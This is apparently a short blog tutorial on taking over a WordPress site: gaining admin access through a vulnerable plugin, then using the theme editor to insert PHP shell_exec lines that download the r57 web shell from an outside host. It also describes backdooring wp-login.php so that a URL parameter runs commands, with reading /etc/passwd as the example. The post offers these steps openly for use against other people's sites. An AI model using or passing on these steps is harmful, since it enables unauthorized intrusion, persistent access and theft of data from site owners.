In this tutorial I will explain how to shell and backd00r a WordPress site.You will need to already have access
to the admin panel of a WordPress site.You can do tis by exploiting vulnerabilities in WordPress plugins like
this one:
http://www.exploit-db.com/exploits/20918/
Shelling the site
Once logged in to the admin panel click on the button labeled Appearance on the side bar, some more buttons
will drop down and it should look like this:
![[Image: dIPqS.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tvzdYcn9d5Ifj_ogopnHT7xiUDifoATNiI4mWLaRH3-wkQr29PeUfYPYcpe4fculp7EfLPjqGOKlu39jGR6uo=s0-d)
Now select the button labeled 'editor'.Now you can edit the php files which means you can upload your shell.
Open the home page and add this code to it:
Code:
shell_exec('wget http://c99.gen.tr/r57.txt');
shell_exec('mv r57.txt shell.php');Now goto the index and the shell will be uploaded!Just goto 'http://siteyouhacked/shell.php' and a r57 shell
will be uploaded!
Backd00ring your site
Backd00ring your shelled site is a good idea incase an admin happens to find your shell delete it and then get
rid of the vulnerable plugin.All you have to do is replace the contents of 'wp-login.php' with this:
wp-login.php
Now go to http://siteyouhacked/wp-login.php?run=cat /etc/passwd and it will run that command.
0 comments:
Post a Comment